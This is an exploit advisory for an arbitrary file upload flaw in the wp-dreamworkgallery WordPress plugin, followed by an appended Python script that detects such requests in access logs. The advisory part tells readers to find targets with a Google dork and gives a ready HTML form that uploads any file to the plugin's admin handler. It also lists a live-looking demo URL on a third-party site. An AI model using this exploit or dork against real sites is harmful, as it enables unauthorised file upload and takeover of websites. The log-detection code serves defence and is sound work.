##################################################JokerSecurity################################
# Title : WordPress File Upload Vulnerability
# Dork : inurl:/wp-content/plugins/wp-dreamworkgallery
# Tested on: [ Kali-Linux]
# MyChannel Youtube : https://www.youtube.com/c/Professionalhacker25
# Myblog : http://kader-information.blogspot.com/
# Link video : https://www.youtube.com/watch?v=h1xWghkVPEw
# Date: 2/04/2017
######################
# [+] DESCRIPTION :
######################
# 1: Search Google Dork and Choose a Target
###########
Code exploit :
###########
<html>
<body>
<form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="task" value="drm_add_new_album" />
  <input type="hidden" name="album_name" value="Arbitrary File Upload" />
  <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
  <input type="file" name="album_img" value="" />
  <input type="submit" value="Submit" />
</form>
</body>
</html>
######
# 3 Upload Your File ==== File.html
######
Demo :
http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml
######################
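# Detection (added example, not part of the original advisory): the form above sends a multipart POST to wp-admin/admin.php?page=dreamwork_manage, and a form opened from a local File.html arrives without a same-site Referer. The Python below flags such requests in an access log; the combined log format, the host example.com and every sample line are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Combined Log Format (assumed): ip ident user [time] "METHOD target PROTO" status size "referer"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)")?'
)

def is_gallery_post(method, target):
    """True for a POST to wp-admin/admin.php with page=dreamwork_manage."""
    parts = urlsplit(target)
    if method != "POST" or not parts.path.endswith("/wp-admin/admin.php"):
        return False
    # parse_qs percent-decodes, so encoded variants of the value also match.
    return "dreamwork_manage" in parse_qs(parts.query).get("page", [])

def find_suspect_posts(lines, site_host):
    """Group matching POSTs by client IP and mark those not referred from site_host."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_gallery_post(m["method"], m["target"]):
            continue
        referer = m["referer"] or "-"
        off_site = urlsplit(referer).hostname != site_host
        hits[m["ip"]].append(
            {"time": m["time"], "status": int(m["status"]), "off_site": off_site})
    return dict(hits)

# Constructed sample lines (documentation IP ranges, example.com as the site).
SAMPLE = [
    '203.0.113.7 - - [02/Apr/2017:10:15:01 +0000] "POST /wp-admin/admin.php?page=dreamwork_manage HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - admin [02/Apr/2017:10:20:44 +0000] "POST /wp-admin/admin.php?page=dreamwork_manage HTTP/1.1" 302 0 "https://example.com/wp-admin/admin.php?page=dreamwork_manage" "Mozilla/5.0"',
    '203.0.113.7 - - [02/Apr/2017:10:14:50 +0000] "GET /wp-admin/admin.php?page=dreamwork_manage HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [02/Apr/2017:10:30:00 +0000] "POST /wp-admin/admin.php?page=other_plugin HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, events in find_suspect_posts(SAMPLE, "example.com").items():
        for e in events:
            flag = "OFF-SITE/NO REFERER" if e["off_site"] else "same-site"
            print(f'{ip} {e["time"]} status={e["status"]} {flag}')
```

# Off-site or missing-Referer hits deserve review first, together with any album image files created at the same timestamps.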